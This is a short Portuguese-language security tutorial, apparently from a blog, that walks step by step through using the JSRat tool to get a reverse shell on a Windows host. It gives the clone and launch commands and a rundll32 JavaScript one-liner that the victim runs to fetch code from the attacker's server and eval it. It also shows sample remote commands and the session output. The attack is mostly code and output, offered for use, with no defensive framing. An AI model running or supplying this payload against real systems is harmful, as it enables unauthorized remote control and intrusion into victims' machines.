InformationSecurityPro
Marcos Henrique
JSRat – Shell Reverso no Windows
O JSRat é uma ferramenta desenvolvida em Python que permite a realização de uma conexão reversa em um host Windows via JavaScript através dos executáveis rundll32.exe e regsvr32.exe.
Projeto : github.com/Hood3dRob1n/JSRat-Py.git
01 - Passo
Realize o download do JSRat-Py, liste o conteúdo do diretório:
Linuxgit clone http://github.com/Hood3dRob1n/JSRat-Py.git cd JSRat-Py/ ls -l
02 - Passo
Confirme o IP do seu host através do comando ipconfig.
Linuxipconfig
03 - Passo
Defina o IP e a Porta de conexão (Atacante), neste exemplo o IP do Linux.
Linux./JSRat.py -i 192.168.0.100 -p 8080
04 - Passo
Na linha Cliente Command at: será gerada uma URL que deve ser aberta no host Windows (Vítima).
http://192.168.0.100:8080/wtf
Linux[*] Client Command at: http://192.168.0.100:8080/wtf
05 - Passo
Agora no host Windows acesse a URL: http://192.168.0.100:8080/wtf/ e copie o comando a seguir :
Linux
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1")
;h.Open("GET","http://192.168.0.100:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}
catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
06 - Passo
Execute o comando no Prompt de Comando e pressione ENTER.
07 - Passo
Ao retornar ao host Linux observe que a conexão foi estabelecida e que uma relação de comandos foi disponibilizada.
08 - Passo
Basta digitar os comandos do Windows, veja alguns exemplos :
Linux$(JSRat)> hostname $(JSRat)> ipconfig $(JSRat)> whoami
09 - Passo
Para sair digite o comando exit, em seguida CTRL + C.
Linux$(JSRat)> exit [-] OK, sending rundll32 kill command to Client... [-] Hit CTRL+C to kill server.... ^C [ERROR] CTRL+C Interupt Detected! [x] Shutting Down Web Server...
São Paulo/SP
